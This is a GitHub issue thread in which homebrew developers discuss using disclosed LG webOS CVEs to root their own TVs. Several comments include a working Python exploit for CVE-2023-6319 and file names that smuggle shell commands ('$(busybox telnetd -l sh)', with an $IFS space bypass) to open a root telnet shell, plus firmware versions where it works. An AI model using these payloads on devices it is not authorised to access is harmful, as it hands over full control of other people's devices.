Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Recent exploits #142

Open
EndlessFractal opened this issue Apr 9, 2024 · 13 comments
Open

Recent exploits #142

EndlessFractal opened this issue Apr 9, 2024 · 13 comments

Comments

@EndlessFractal
Copy link

EndlessFractal commented Apr 9, 2024
edited

I wonder if it's enough for a RootMyTV v3...

https://www.cve.org/CVERecord?id=CVE-2023-6317
https://www.cve.org/CVERecord?id=CVE-2023-6318
https://www.cve.org/CVERecord?id=CVE-2023-6319
https://www.cve.org/CVERecord?id=CVE-2023-6320

Source: https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
@DavidBuchanan314
Copy link
Collaborator

DavidBuchanan314 commented Apr 9, 2024
edited

Thanks, this does actually sound extremely usable. Iff we're going to do a v3 release, we should probably prioritize using these bugs since they're already known to LG. (we were also aware of some of these bugs already ;) )

@DavidBuchanan314
Copy link
Collaborator

Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.

@EndlessFractal
Copy link
Author

Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.

I have misinterpreted the news. My apologies! What I meant to say was that the exploits were discovered by Bitdefender researchers, which could potentially attract the attention of malicious actors. As a security researcher, I'll keep an eye out! 👀

Cheers and my apologies again!

@DavidBuchanan314 DavidBuchanan314 mentioned this issue Apr 10, 2024
Closed
@illixion
Copy link

Can confirm that CVE-2023-6319 (getAudioMetadata) works on my LG OLED C1 with webOS 6.0 (03.36.50), managed to successfully get root and install the homebrew app, I've also tried CVE-2023-6318 (processAnalyticsReport) but it didn't seem to work.

In case it helps, all I did was scp an MP3 and an LRC file as described in the article to /media/developer/temp/ using the LG developer mode SSH server with names like myaud_$(busybox telnetd -l sh).mp3, then ran this Python script:

import asyncio
from aiopylgtv import WebOsClient

HOST = "TV_IP_ADDR"

async def main():
    client = await WebOsClient.create(HOST)
    await client.connect()

    await client.luna_request("com.webos.service.attachedstoragemanager/getAudioMetadata", {
        "deviceId": "0bcef",
        "fullPath": "/media/developer/temp/myaud_$(busybox telnetd -l sh).mp3"
    })

    await client.disconnect()

if __name__ == "__main__":
    asyncio.run(main())

I've also tried to make an all-in-one script using com.webos.service.downloadmanager/download to push the files to the filesystem, but it blocks URLs with spaces in the name, so if anyone has a workaround then please let me know.

@DavidBuchanan314
Copy link
Collaborator

@illixion I haven't tried against my TV at all but I think you'll find you can bypass the need for spaces entirely by replacing them with $IFS, i.e.

"/media/developer/temp/myaud_$(busybox$IFStelnetd$IFS-l$IFSsh).mp3"

(again, untested!)

@DavidBuchanan314 DavidBuchanan314 pinned this issue Apr 11, 2024
@illixion
Copy link

illixion commented Apr 11, 2024
edited

@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on /mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3 which does work! I'll post a guide along with an updated script on my blog for those who are interested.

Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/

@qnorsten
Copy link

@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on /mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3 which does work! I'll post a guide along with an updated script on my blog for those who are interested.

Looking forward to that post. Great work.

@revilo196
Copy link

Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/

@illixion can confirm you script working on my TVs:
webOS 7.3.1-39 03.33.65 (OLED42C21LA)
webOS 7.3.1-43 03.33.85 (75NANO756QA)

@SteadyStatus21
Copy link

SteadyStatus21 commented Apr 15, 2024
edited

Moved to illixion/root-my-webos-tv#1 (comment).

tl;dr - webOS version 05.40.20 doesn't work for me.

@milkpirate
Copy link

milkpirate commented Apr 17, 2024
edited

@illixion does not seem to work on 😞
webOS 7.3.1-42 03.33.80 (43UQ80009LB)

Is it possible to update to a specific version? I.e. 7.3.1-43? Would not want to let my TV do it on its own...

@illixion
Copy link

Please create issues related to my script in its repo instead of here, so we can have everything documented and categorized in one place: https://github.com/illixion/root-my-webos-tv

@pivoivo
Copy link

pivoivo commented Apr 19, 2024

For all of that is a bit to heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root an TV with 6.10.30 firmware, right?

@qnorsten
Copy link

qnorsten commented Apr 22, 2024
edited

For all of that is a bit to heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root an TV with 6.10.30 firmware, right?

Recently discovered https://github.com/throwaway96/dejavuln-autoroot should work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
8 participants
@milkpirate @revilo196 @qnorsten @DavidBuchanan314 @illixion @pivoivo @SteadyStatus21 @EndlessFractal